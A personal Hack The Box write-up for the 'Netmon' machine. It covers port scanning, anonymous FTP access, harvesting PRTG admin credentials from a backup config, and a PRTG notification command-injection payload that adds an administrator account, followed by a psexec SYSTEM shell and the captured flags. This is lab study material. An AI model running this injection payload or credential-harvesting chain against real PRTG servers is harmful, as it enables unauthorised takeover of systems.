HTB Netmon done
Netmon
TODO
FTP - anonymous
SMB
exploits:
- PRTG/18.1.37.13946
- Indy httpd 18.1.37.13946
OS:
Windows
Technology:
PRTG/18.1.37.13946
Indy httpd 18.1.37.13946
IP Address:
10.129.230.176
Open ports:
21/tcp open ftp Microsoft ftpd
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Users and pass:
From file: ./ProgramData/Paessler/PRTG Network Monitor/PRTG Configuration.old.bak
L: prtgadmin
P: PrTg@dmin2018
We have to change last char from password
Correct password is: PrTg@dmin2019
---
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Netmon]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.232.196_nmap 10.129.232.196 ; cat 10.129.232.196_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-16 21:30 UTC
Nmap scan report for 10.129.232.196
Host is up (0.038s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19 11:18PM 1024 .rnd
| 02-25-19 09:15PM <DIR> inetpub
| 07-16-16 08:18AM <DIR> PerfLogs
| 02-25-19 09:56PM <DIR> Program Files
| 02-02-19 11:28PM <DIR> Program Files (x86)
| 02-03-19 07:08AM <DIR> Users
|_11-10-23 09:20AM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
Ffuz: http://10.129.230.176/FUZZ
Rabbit hole
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Netmon]
└─$ ffuf -u http://10.129.230.176/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.129.230.176_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.230.176/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md
:: Output file : 10.129.230.176_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
favicon.ico [Status: 200, Size: 1150, Words: 4, Lines: 1, Duration: 85ms]
:: Progress: [143283/143283] :: Job [1/1] :: 362 req/sec :: Duration: [0:11:56] :: Errors: 0 ::
FTP: ftp://10.129.230.176
List folder: ./ProgramData/Paessler/PRTG Network Monitor
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Netmon]
└─$ ftp -A ftp://anonymous:[email protected]
Connected to 10.129.230.176.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT.
200 Type set to I.
ftp> ls -a
200 EPRT command successful.
125 Data connection already open; Transfer starting.
11-20-16 09:46PM <DIR> $RECYCLE.BIN
02-02-19 11:18PM 1024 .rnd
11-20-16 08:59PM 389408 bootmgr
07-16-16 08:10AM 1 BOOTNXT
02-03-19 07:05AM <DIR> Documents and Settings
02-25-19 09:15PM <DIR> inetpub
11-17-24 04:48PM 738197504 pagefile.sys
07-16-16 08:18AM <DIR> PerfLogs
02-25-19 09:56PM <DIR> Program Files
02-02-19 11:28PM <DIR> Program Files (x86)
12-15-21 09:40AM <DIR> ProgramData
02-03-19 07:05AM <DIR> Recovery
02-03-19 07:04AM <DIR> System Volume Information
02-03-19 07:08AM <DIR> Users
11-10-23 09:20AM <DIR> Windows
226 Transfer complete.
ftp> cd ProgramData
250 CWD command successful.
ftp> ls -a
200 EPRT command successful.
125 Data connection already open; Transfer starting.
02-03-19 07:05AM <DIR> Application Data
12-15-21 09:40AM <DIR> Corefig
02-03-19 07:05AM <DIR> Desktop
02-03-19 07:05AM <DIR> Documents
02-02-19 11:15PM <DIR> Licenses
11-20-16 09:36PM <DIR> Microsoft
02-02-19 11:18PM <DIR> Paessler
02-03-19 07:05AM <DIR> regid.1991-06.com.microsoft
07-16-16 08:18AM <DIR> SoftwareDistribution
02-03-19 07:05AM <DIR> Start Menu
02-02-19 11:15PM <DIR> TEMP
02-03-19 07:05AM <DIR> Templates
11-20-16 09:19PM <DIR> USOPrivate
11-20-16 09:19PM <DIR> USOShared
02-25-19 09:56PM <DIR> VMware
226 Transfer complete.
ftp> cd Paessler
250 CWD command successful.
ftp> ls -a
200 EPRT command successful.
150 Opening ASCII mode data connection.
11-17-24 05:30PM <DIR> PRTG Network Monitor
226 Transfer complete.
ftp> cd PRTG\ Network\ Monitor
250 CWD command successful.
ftp> ls -a
200 EPRT command successful.
125 Data connection already open; Transfer starting.
11-17-24 05:31PM <DIR> Configuration Auto-Backups
11-17-24 04:59PM <DIR> Log Database
02-02-19 11:18PM <DIR> Logs (Debug)
02-02-19 11:18PM <DIR> Logs (Sensors)
02-02-19 11:18PM <DIR> Logs (System)
11-17-24 04:59PM <DIR> Logs (Web Server)
11-17-24 04:59PM <DIR> Monitoring Database
02-25-19 09:54PM 1189697 PRTG Configuration.dat
02-25-19 09:54PM 1189697 PRTG Configuration.old
07-14-18 02:13AM 1153755 PRTG Configuration.old.bak
11-17-24 05:30PM 1673127 PRTG Graph Data Cache.dat
02-25-19 10:00PM <DIR> Report PDFs
02-02-19 11:18PM <DIR> System Information Database
02-02-19 11:40PM <DIR> Ticket Database
02-02-19 11:18PM <DIR> ToDo Database
226 Transfer complete.
ftp> exit
221 Goodbye.
Download folder: ./ProgramData/Paessler/
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Netmon]
└─$ wget -r ftp://10.129.230.176/ProgramData/Paessler
--2024-11-17 22:35:43-- ftp://10.129.230.176/ProgramData/Paessler
=> ‘10.129.230.176/ProgramData/.listing’
Connecting to 10.129.230.176:21... connected.
Logging in as anonymous ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD (1) /ProgramData ... done.
==> PASV ... done. ==> LIST ... done.
10.129.230.176/ProgramData/.l [ <=> ] 774 --.-KB/s in 0s
==> PASV ... done. ==> LIST ... done.
10.129.230.176/ProgramData/.l [ <=> ] 518 --.-KB/s in 0s
==> PASV ... done. ==> LIST ... done.
10.129.230.176/ProgramData/.l [ <=> ] 774 --.-KB/s in 0s
2024-11-17 22:35:45 (354 MB/s) - ‘10.129.230.176/ProgramData/.listing’ saved [2066]
Removed ‘10.129.230.176/ProgramData/.listing’.
--2024-11-17 22:35:45-- ftp://10.129.230.176/ProgramData/Paessler/Paessler
=> ‘10.129.230.176/ProgramData/Paessler/.listing’
==> CWD (1) /ProgramData/Paessler ... done.
==> PASV ... done. ==> LIST ... done.
10.129.230.176/ProgramData/Pa [ <=> ] 61 --.-KB/s in 0.05s
2024-11-17 22:35:46 (1.09 KB/s) - ‘10.129.230.176/ProgramData/Paessler/.listing’ saved [61]
Removed ‘10.129.230.176/ProgramData/Paessler/.listing’.
--2024-11-17 22:35:46-- ftp://10.129.230.176/ProgramData/Paessler/PRTG%20Network%20Monitor/Paessler
=> ‘10.129.230.176/ProgramData/Paessler/PRTG Network Monitor/.listing’
==> CWD (1) /ProgramData/Paessler/PRTG Network Monitor ... done.
==> PASV ... done. ==> LIST ... done.
10.129.230.176/ProgramData/Pa [ <=> ] 889 --.-KB/s in 0s
2024-11-17 22:35:46 (3.15 MB/s) - ‘10.129.230.176/ProgramData/Paessler/PRTG Network Monitor/.listing’ saved [889]
Removed ‘10.129.230.176/ProgramData/Paessler/PRTG Network Monitor/.listing’.
--2024-11-17 22:35:46-- ftp://10.129.230.176/ProgramData/Paessler/PRTG%20Network%20Monitor/PRTG%20Configuration.dat
=> ‘10.129.230.176/ProgramData/Paessler/PRTG Network Monitor/PRTG Configuration.dat’
==> CWD not required.
==> PASV ... done. ==> RETR PRTG Configuration.dat ... done.
Length: 1189697 (1.1M)
Read config file: PRTG Configuration.old.bak
I found creds:
L: prtgadmin
P: PrTg@dmin2018
---
┌──(kali㉿kali)-[~/…/10.129.230.176/ProgramData/Paessler/PRTG Network Monitor]
└─$ cat PRTG\ Configuration.old.bak | grep -A2 User
<!-- User: prtgadmin -->
PrTg@dmin2018
</dbpassword>
--
Email to all members of group PRTG Users Group
</name>
<ownerid>
--
User Groups
</name>
<ownerid>
--
PRTG Users Group
</name>
<ownerid>
--
Users
</name>
<ownerid>
Privilege Escalation
Login into website as prtgadmin
Website: http://10.129.230.176/index.htm
L: prtgadmin
P: PrTg@dmin2019
Edit notification
Payload: aaa.txt ; net user hacker Qwerty123! /add ; net localgroup administrators hacker /add
---
Path:
Menu: Setup --> Account Settings --> Notifications --> Add new notification (right side)
Add payload to "Execute Program"
Run notification
Sent test notification (righ side: small bell)
Login as a new user with admin privilages
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Netmon]
└─$ psexec.py hacker:'Qwerty123!'@10.129.230.176
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.129.230.176.....
[*] Found writable share ADMIN$
[*] Uploading file agLDJbNY.exe
[*] Opening SVCManager on 10.129.230.176.....
[*] Creating service ZAyu on 10.129.230.176.....
[*] Starting service ZAyu.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd C:\Users\Public\Desktop
Read flag: user.txt
C:\Windows\system32> cd C:\Users\Public\Desktop
C:\Users\Public\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 0EF5-E5E5
Directory of C:\Users\Public\Desktop
01/15/2024 10:03 AM <DIR> .
01/15/2024 10:03 AM <DIR> ..
02/02/2019 11:18 PM 1,195 PRTG Enterprise Console.lnk
02/02/2019 11:18 PM 1,160 PRTG Network Monitor.lnk
11/18/2024 07:37 AM 34 user.txt
3 File(s) 2,389 bytes
2 Dir(s) 6,732,279,808 bytes free
C:\Users\Public\Desktop> whoami ; ifconfig ; type user.txt
ERROR: Invalid argument/option - ';'.
Type "WHOAMI /?" for usage.
C:\Users\Public\Desktop> whoami
nt authority\system
C:\Users\Public\Desktop> ifconfig
'ifconfig' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\Public\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::e1e6:a83a:8b:6a90
Link-local IPv6 Address . . . . . : fe80::e1e6:a83a:8b:6a90%3
IPv4 Address. . . . . . . . . . . : 10.129.230.176
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:7437%3
10.129.0.1
Tunnel adapter isatap..htb:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : .htb
C:\Users\Public\Desktop> type user.txt
effbeb76ea826a02563b59aeb2c52b24
Read flag: root.txt
C:\Users\Public\Desktop> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> whoami
nt authority\system
C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::e1e6:a83a:8b:6a90
Link-local IPv6 Address . . . . . : fe80::e1e6:a83a:8b:6a90%3
IPv4 Address. . . . . . . . . . . : 10.129.230.176
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:7437%3
10.129.0.1
Tunnel adapter isatap..htb:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : .htb
C:\Users\Administrator\Desktop> type root.txt
cb1e681bf6d0988053f3b14a7df5b234
C:\Users\Administrator\Desktop>
References
[PRTG < 18.2.39 Command Injection Vulnerability]( https://codewatch.org/2018/06/25/prtg-18-2-39-command-injection-vulnerability/)
Lessons Learned